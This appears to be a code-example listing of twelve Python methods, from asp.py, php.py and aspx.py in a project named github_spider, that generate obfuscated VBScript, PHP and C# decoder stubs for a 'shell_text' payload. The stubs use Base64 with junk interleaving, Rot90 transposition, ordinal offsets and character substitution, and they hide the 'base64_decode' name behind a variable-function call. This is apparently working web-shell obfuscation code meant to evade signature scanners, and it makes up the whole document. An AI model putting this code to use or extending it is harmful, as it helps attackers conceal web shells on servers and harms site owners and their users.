コード例 #1
ファイル: asp.py プロジェクト: TinSyner/github_spider
    def RotPlus(self):
        """Return VBScript text that rebuilds the Rot90-encoded script text.

        ``self.shell_text`` is passed through ``self.Executable`` and then
        ``Encoders(...).Rot90()``, which returns the encoded string and a row
        count.  The emitted stub declares four variables plus ``i`` and ``r``,
        re-assembles the encoded string chunk by chunk, spreads each block of
        ``rows`` characters across an array of strings, and finally joins and
        trims that array.

        NOTE(review): identifiers come from ``self.makeVars()`` (presumably
        randomised -- confirm), so the fixed statement skeleton rather than
        the variable names is the stable trait of generated output.

        Returns:
            The stub as a single string, one statement per line.
        """
        def vb_escape(text):
            # Double embedded quotes first, then splice real newline and tab
            # characters back in through chr() concatenations.
            text = text.replace('"', '""')
            text = text.replace('\n', '" & chr(10) & "')
            return text.replace('\t', '" & chr(9) & "')

        encoded, rows = Encoders(self.Executable(self.shell_text)).Rot90()
        chunks = self.makeVals(encoded)
        names = [self.makeVars() for _ in range(4)]
        self.vars = names
        buf, count, grid, out = names
        row_text = str(rows)

        lines = [
            'dim ' + buf + ', ' + count + ', ' + grid + '(' + row_text +
            '), ' + out + ', i, r \n',
            count + ' = ' + row_text + ' \n',
            buf + ' = "" \n',
        ]
        for chunk in chunks:
            lines.append(
                buf + ' = ' + buf + ' & "' + vb_escape(chunk) + '" \n')
        lines.append('for i = 0 to (len(' + buf + ') / ' + count + ') - 1 \n')
        lines.append(
            'for r = 1 to ' + count + ' : ' + grid + '(r) = ' + grid +
            '(r) & mid(' + buf + ', r + i * ' + count + ', 1) : next \n')
        lines.append('next \n')
        lines.append(out + ' = trim(join(' + grid + ', "")) \n')
        return ''.join(lines)
コード例 #2
ファイル: asp.py プロジェクト: TinSyner/github_spider
    def Random(self):
        """Return VBScript text that reverses the ``Random`` character mapping.

        ``Encoders(...).Random()`` returns the encoded text and two strings,
        ``cs1`` and ``cs2``.  The emitted stub stores the encoded text and
        both strings in variables, then walks the text one character at a
        time: a character found in the variable holding ``cs1`` is replaced
        through an ``instr``/``mid`` lookup, any other character is copied
        unchanged.

        Written for Python 2 string semantics: the result of
        ``encode('unicode-escape')`` is handled as ordinary text.

        NOTE(review): identifiers come from ``self.makeVars()`` (presumably
        randomised -- confirm); the statement skeleton is constant.

        Returns:
            The stub as a single string.
        """
        def vb_literal(text):
            # Order matters: quotes are doubled, doubled backslashes are
            # collapsed, then the textual \n and \t escapes become chr()
            # splices.
            text = text.replace('"', '""')
            text = text.replace('\\\\', '\\')
            text = text.replace('\\n', '" & chr(10) & "')
            return text.replace('\\t', '" & chr(9) & "')

        encoded, cs1, cs2 = Encoders(self.Executable(self.shell_text)).Random()
        chunks = self.makeVals(encoded)
        names = [self.makeVars() for _ in range(4)]
        self.vars = names
        # Slot 1 receives cs2 and slot 2 receives cs1, as in the emitted text.
        buf, holds_cs2, holds_cs1, out = names

        parts = [
            'dim ' + buf + ', ' + holds_cs2 + ', ' + holds_cs1 + ', ' + out +
            ' \n',
            out + ' = "" \n',
            buf + ' = "" \n',
        ]
        for chunk in chunks:
            parts.append(
                buf + ' = ' + buf + ' & "' +
                vb_literal(chunk.encode('unicode-escape')) + '" \n')
        parts.append(
            holds_cs2 + ' = "' + vb_literal(cs2.encode('unicode-escape')) +
            '" \n')
        parts.append(
            holds_cs1 + ' = "' + vb_literal(cs1.encode('unicode-escape')) +
            '" \n')
        parts.append('for i = 1 to len(' + buf + ') \n')

        # Both branches test the same membership expression.
        probe = 'instr(1, ' + holds_cs1 + ', mid(' + buf + ', i, 1))'
        parts.append(
            'if ' + probe + ' > 0 then ' + out + ' = ' + out + ' & mid(' +
            holds_cs1 + ', instr(1, ' + holds_cs2 + ', mid(' + buf +
            ', i, 1)), 1) \n')
        parts.append(
            'if ' + probe + ' = 0 then ' + out + ' = ' + out + ' & mid(' +
            buf + ', i, 1) \n')
        parts.append('next \n')
        return ''.join(parts)
コード例 #3
ファイル: php.py プロジェクト: TinSyner/github_spider
    def OrdPlus(self):
        """Return PHP text that decodes the ``OrdPlus``-encoded script text.

        ``Encoders(...).OrdPlus()`` returns the encoded text, an integer
        offset and a separator string.  The emitted stub concatenates the
        encoded chunks, splits the result on the separator with ``explode``
        and appends ``chr(value - offset)`` for every piece.

        NOTE(review): the three ``$`` identifiers come from
        ``self.makeVars()`` (presumably randomised -- confirm); the
        ``explode``/``chr`` loop itself is emitted verbatim every time.

        Returns:
            The stub as a single string.
        """
        encoded, ord_plus, chr_join = Encoders(self.shell_text).OrdPlus()
        chunks = self.makeVals(encoded)
        names = ['$' + self.makeVars() for _ in range(3)]
        self.vars = names
        buf, item, out = names

        lines = [out + ' = ""; \n', buf + ' = ""; \n']
        for chunk in chunks:
            lines.append(buf + ' .= "' + chunk + '"; \n')
        lines.append(
            'foreach(explode("' + chr_join + '", ' + buf + ') as ' + item +
            ') ' + out + ' .= chr(' + item + ' - ' + str(ord_plus) + '); \n')
        return ''.join(lines)
コード例 #4
ファイル: aspx.py プロジェクト: TinSyner/github_spider
    def Base64(self):
        """Return C# text that strips a junk marker and Base64-decodes the text.

        The Base64 form of ``self.shell_text`` is interleaved with a junk
        string from ``self.makeJunk`` (via ``self.makeVals``).  The emitted
        stub accumulates the chunks in one string variable and then emits a
        ``Convert.FromBase64String(...Replace(@"<junk>", ""))`` expression
        wrapped in ``Encoding.UTF8.GetString``.

        NOTE(review): six names are *appended* to the existing ``self.vars``;
        the chunks are accumulated in ``self.vars[4]`` while the decode
        expression reads ``self.vars[1]``.  Which names those are depends on
        what ``self.vars`` held before the call, which is not visible here.

        Returns:
            The stub as a single string.
        """
        encoded = Encoders(self.shell_text).Base64()
        junk = self.makeJunk(encoded, self.an_chars)
        chunks = self.makeVals(encoded, junk)
        self.vars += [self.makeVars() for _ in range(6)]
        buf = self.vars[4]
        decoded = self.vars[5]
        source = self.vars[1]

        lines = ['string ' + buf + ' = ""; \n']
        for chunk in chunks:
            lines.append(buf + ' += "' + chunk + '"; \n')
        lines.append(
            'string ' + decoded + ' = Encoding.UTF8.GetString(' +
            'Convert.FromBase64String(' + source + '.Replace(@"' + junk +
            '", ""))); \n')
        return ''.join(lines)
コード例 #5
ファイル: aspx.py プロジェクト: TinSyner/github_spider
    def OrdPlus(self):
        """Return C# text that decodes the ``OrdPlus``-encoded script text.

        ``Encoders(...).OrdPlus()`` returns the encoded text, an integer
        offset and a separator.  The emitted stub concatenates the chunks,
        splits on the separator and appends
        ``(char)(Convert.ToInt32(piece) - offset)`` for each piece.

        NOTE(review): seven names are generated by ``self.makeVars()``
        (presumably randomised -- confirm) but only slots 4, 5 and 6 appear
        in the emitted text; the ``Split``/``Convert.ToInt32`` loop is fixed.

        Returns:
            The stub as a single string.
        """
        encoded, ord_plus, chr_join = Encoders(self.shell_text).OrdPlus()
        chunks = self.makeVals(encoded)
        names = [self.makeVars() for _ in range(7)]
        self.vars = names
        buf, item, out = names[4], names[5], names[6]

        lines = [
            'string ' + out + ' = ""; \n',
            'string ' + buf + ' = ""; \n',
        ]
        for chunk in chunks:
            lines.append(buf + ' += "' + chunk + '"; \n')
        lines.append(
            'foreach(string ' + item + ' in ' + buf + ".Split('" + chr_join +
            "')) { " + out + ' += (char)(Convert.ToInt32(' + item + ') - ' +
            str(ord_plus) + '); } \n')
        return ''.join(lines)
コード例 #6
ファイル: php.py プロジェクト: TinSyner/github_spider
    def Random(self):
        """Return PHP text that reverses the ``Random`` character mapping.

        ``Encoders(...).Random()`` returns the encoded text and two strings,
        ``cs1`` and ``cs2``.  The emitted stub stores all three in variables
        and, for each character of the encoded text, either copies it or
        replaces it with the character of the ``cs1`` variable found at the
        ``strpos`` position in the ``cs2`` variable.

        Written for Python 2 string semantics: the result of
        ``encode('unicode-escape')`` is handled as ordinary text.

        NOTE(review): the ``$`` identifiers come from ``self.makeVars()``
        (presumably randomised -- confirm); the ``str_split``/``strpos`` loop
        and the literal ``$c`` are emitted unchanged.

        Returns:
            The stub as a single string.
        """
        def php_literal(text):
            # Escape for a double-quoted PHP string: quotes and '$' must not
            # terminate the literal or start interpolation.
            escaped = text.encode('unicode-escape')
            escaped = escaped.replace('"', '\\"')
            return escaped.replace("$", "\\$")

        encoded, cs1, cs2 = Encoders(self.shell_text).Random()
        chunks = self.makeVals(encoded)
        names = ['$' + self.makeVars() for _ in range(4)]
        self.vars = names
        buf, holds_cs1, holds_cs2, out = names

        lines = [out + ' = ""; \n', buf + ' = ""; \n']
        for chunk in chunks:
            lines.append(buf + ' .= "' + php_literal(chunk) + '"; \n')
        lines.append(holds_cs1 + ' = "' + php_literal(cs1) + '"; \n')
        lines.append(holds_cs2 + ' = "' + php_literal(cs2) + '"; \n')
        lines.append(
            'foreach(str_split(' + buf + ') as $c) { ' + out +
            ' .= (strpos(' + holds_cs2 + ', $c) === false) ? $c : ' +
            holds_cs1 + '[strpos(' + holds_cs2 + ', $c)]; } \n')
        return ''.join(lines)
コード例 #7
ファイル: php.py プロジェクト: TinSyner/github_spider
    def Base64(self):
        """Return PHP text that strips a junk marker and Base64-decodes the text.

        The Base64 form of ``self.shell_text`` is interleaved with a junk
        string from ``self.makeJunk``.  The quoted name ``"base64_decode"`` is
        interleaved with the same junk, so the function name never appears
        contiguously in the output: the emitted stub recovers both the data
        and the function name with ``str_replace`` and then calls the
        function through a variable.

        NOTE(review): because of that, a plain string match on
        ``base64_decode`` will not hit generated output; the
        ``str_replace`` pair followed by a variable-function call is the
        constant structure.  Four names are *appended* to the existing
        ``self.vars`` while slots 0-3 are used, so the names used depend on
        what ``self.vars`` held before the call (not visible here).

        Returns:
            The stub as a single string.
        """
        encoded = Encoders(self.shell_text).Base64()
        junk = self.makeJunk(encoded + 'base64_decode', self.an_chars)
        chunks = self.makeVals(encoded, junk)
        self.vars += ['$' + self.makeVars() for _ in range(4)]
        buf = self.vars[0]
        cleaned = self.vars[1]
        func = self.vars[2]
        out = self.vars[3]

        # Joining over the string puts the junk between every character,
        # including the surrounding double quotes.
        b64 = junk.join('"base64_decode"')

        lines = [buf + ' = ""; \n']
        for chunk in chunks:
            lines.append(buf + ' .= "' + chunk + '"; \n')
        lines.append(
            cleaned + ' = str_replace( "' + junk + '", "", ' + buf +
            ' ); \n')
        lines.append(
            func + ' = str_replace( "' + junk + '", "", ' + b64 + ' ); \n')
        lines.append(out + ' = ' + func + '( ' + cleaned + ' ); \n')
        return ''.join(lines)
コード例 #8
ファイル: aspx.py プロジェクト: TinSyner/github_spider
    def Random(self):
        """Return C# text that reverses the ``Random`` character mapping.

        ``Encoders(...).Random()`` returns the encoded text and two strings,
        ``cs1`` and ``cs2``.  The emitted stub stores them in string
        variables and, for each ``char c`` of the encoded text, appends
        either ``c`` or the character of the ``cs1`` variable at the
        ``IndexOf(c)`` position in the ``cs2`` variable.

        Written for Python 2 string semantics: the result of
        ``encode('unicode-escape')`` is handled as ordinary text.

        NOTE(review): eight names are generated by ``self.makeVars()``
        (presumably randomised -- confirm) but only slots 4-7 appear in the
        emitted text; the ``Contains``/``IndexOf`` loop is fixed.

        Returns:
            The stub as a single string.
        """
        def cs_literal(text):
            # Escape for a regular C# string literal.
            return text.encode('unicode-escape').replace('"', '\\"')

        encoded, cs1, cs2 = Encoders(self.shell_text).Random()
        chunks = self.makeVals(encoded)
        names = [self.makeVars() for _ in range(8)]
        self.vars = names
        holds_cs1, buf, holds_cs2, out = names[4:8]

        lines = [
            'string ' + out + ' = ""; \n',
            'string ' + holds_cs1 + ' = "' + cs_literal(cs1) + '"; \n',
            'string ' + holds_cs2 + ' = "' + cs_literal(cs2) + '"; \n',
            'string ' + buf + ' = ""; \n',
        ]
        for chunk in chunks:
            lines.append(buf + ' += "' + cs_literal(chunk) + '"; \n')
        lines.append(
            'foreach(char c in ' + buf + ') { ' + out + ' += ' + holds_cs2 +
            '.Contains(c.ToString()) ? ' + holds_cs1 + '[' + holds_cs2 +
            '.IndexOf(c)] : c; } \n')
        return ''.join(lines)
コード例 #9
ファイル: asp.py プロジェクト: TinSyner/github_spider
    def OrdPlus(self):
        """Return VBScript text that decodes the ``OrdPlus``-encoded script text.

        ``self.shell_text`` is passed through ``self.Executable`` and
        ``Encoders(...).OrdPlus()``, which returns the encoded text, an
        integer offset and a separator.  The emitted stub concatenates the
        chunks, splits on the separator and appends ``chr(piece - offset)``
        for each piece.

        NOTE(review): the three identifiers come from ``self.makeVars()``
        (presumably randomised -- confirm); the ``for each ... in split``
        line is emitted with a fixed shape.

        Returns:
            The stub as a single string.
        """
        encoded, ord_plus, chr_join = Encoders(
            self.Executable(self.shell_text)).OrdPlus()
        chunks = self.makeVals(encoded)
        names = [self.makeVars() for _ in range(3)]
        self.vars = names
        buf, item, out = names

        lines = [
            'dim ' + buf + ', ' + item + ', ' + out + ' \n',
            out + ' = "" \n',
            buf + ' = "" \n',
        ]
        for chunk in chunks:
            lines.append(buf + ' = ' + buf + ' & "' + chunk + '" \n')
        lines.append(
            'for each ' + item + ' in split(' + buf + ', "' + chr_join +
            '") : ' + out + ' = ' + out + ' & chr(' + item + ' - ' +
            str(ord_plus) + ') : next \n')
        return ''.join(lines)
コード例 #10
ファイル: asp.py プロジェクト: TinSyner/github_spider
    def Base64(self):
        """Return VBScript text that strips a junk marker and Base64-decodes.

        The Base64 form of ``self.Executable(self.shell_text)`` is
        interleaved with a junk string from ``self.makeJunk``.  The emitted
        stub accumulates the chunks, embeds the module-level ``VBS_B64``
        text (presumably the ``Base64`` class definition it instantiates --
        confirm), removes the junk with ``Replace`` and calls ``.Decode``.

        NOTE(review): four names are *appended* to the existing
        ``self.vars`` while slots 0-3 are used, so the names in the output
        depend on what ``self.vars`` held before the call (not visible
        here).  ``new Base64`` and ``.Decode(`` are emitted literally.

        Returns:
            The stub as a single string.
        """
        encoded = Encoders(self.Executable(self.shell_text)).Base64()
        junk = self.makeJunk(encoded, self.an_chars)
        chunks = self.makeVals(encoded, junk)
        self.vars += [self.makeVars() for _ in range(4)]
        buf = self.vars[0]
        decoder = self.vars[1]
        cleaned = self.vars[2]
        out = self.vars[3]

        lines = [
            'dim ' + buf + ', ' + decoder + ', ' + cleaned + ', ' + out +
            ' \n',
            buf + ' = "" \n',
        ]
        for chunk in chunks:
            lines.append(buf + ' = ' + buf + ' & "' + chunk + '" \n')
        lines.append(VBS_B64 + ' \nset ' + decoder + ' = new Base64 \n')
        lines.append(
            cleaned + ' = Replace( ' + buf + ', "' + junk + '", "") \n')
        lines.append(out + ' = ' + decoder + '.Decode( ' + cleaned + ' ) \n')
        return ''.join(lines)
コード例 #11
ファイル: aspx.py プロジェクト: TinSyner/github_spider
    def RotPlus(self):
        """Return C# text that rebuilds the Rot90-encoded script text.

        ``Encoders(...).Rot90()`` returns the encoded string and a row
        count.  The emitted stub declares the row count and a ``string[]``
        of that size, re-assembles the encoded string chunk by chunk,
        spreads each block of ``rows`` characters across the array and
        finally ``String.Join``s and trims it.

        Written for Python 2 string semantics: the result of
        ``encode('unicode-escape')`` is handled as ordinary text.

        NOTE(review): eight names are generated by ``self.makeVars()``
        (presumably randomised -- confirm) but only slots 4-7 appear in the
        emitted text; the nested ``for`` skeleton is fixed.

        Returns:
            The stub as a single string.
        """
        def cs_literal(text):
            # Escape for a regular C# string literal.
            return text.encode('unicode-escape').replace('"', '\\"')

        encoded, rows = Encoders(self.shell_text).Rot90()
        chunks = self.makeVals(encoded)
        names = [self.makeVars() for _ in range(8)]
        self.vars = names
        buf, count, grid, out = names[4:8]
        row_text = str(rows)

        lines = [
            'int ' + count + ' = ' + row_text + '; \n',
            'string[] ' + grid + ' = new string[' + row_text + ']; \n',
            'string ' + buf + ' = "" ; \n',
        ]
        for chunk in chunks:
            lines.append(buf + ' += "' + cs_literal(chunk) + '"; \n')
        lines.append(
            'for(int i = 0; i < ' + buf + '.Length / ' + count + '; i++) ' +
            '{ for(int r = 0; r < ' + count + '; r++) ' + grid +
            '[r] += ' + buf + '[r + i * ' + count + ']; } \n')
        lines.append(
            'string ' + out + ' = String.Join("", ' + grid + ').Trim(); \n')
        return ''.join(lines)
コード例 #12
ファイル: php.py プロジェクト: TinSyner/github_spider
    def RotPlus(self):
        """Return PHP text that rebuilds the Rot90-encoded script text.

        ``Encoders(...).Rot90()`` returns the encoded string and a row
        count.  The emitted stub stores the row count, creates an array with
        one empty string per row, re-assembles the encoded string chunk by
        chunk, spreads each block of ``rows`` characters across the array
        and finally ``implode``s and trims it.

        Written for Python 2 string semantics: the result of
        ``encode('unicode-escape')`` is handled as ordinary text.

        NOTE(review): the ``$`` identifiers come from ``self.makeVars()``
        (presumably randomised -- confirm); the loop counters ``$i`` and
        ``$r`` and the nested ``for`` skeleton are emitted literally.

        Returns:
            The stub as a single string.
        """
        def php_literal(text):
            # Escape for a double-quoted PHP string: quotes and '$' must not
            # terminate the literal or start interpolation.
            escaped = text.encode('unicode-escape')
            escaped = escaped.replace('"', '\\"')
            return escaped.replace("$", "\\$")

        encoded, rows = Encoders(self.shell_text).Rot90()
        chunks = self.makeVals(encoded)
        names = ['$' + self.makeVars() for _ in range(4)]
        self.vars = names
        buf, count, grid, out = names

        lines = [
            count + ' = ' + str(rows) + '; \n',
            grid + ' = array(); \n',
            buf + ' = "" ; \n',
        ]
        for chunk in chunks:
            lines.append(buf + ' .= "' + php_literal(chunk) + '"; \n')
        lines.append(
            'for($i = 0; $i < ' + count + '; $i++) ' + grid + '[] = ""; \n')
        lines.append(
            'for($i = 0; $i < (strlen(' + buf + ') / ' + count +
            '); $i++) ' + '{ for($r = 0; $r < ' + count + '; $r++) ' +
            grid + '[$r] .= ' + buf + '[$r + $i * ' + count + ']; } \n')
        lines.append(out + ' = trim(implode("", ' + grid + ')); \n')
        return ''.join(lines)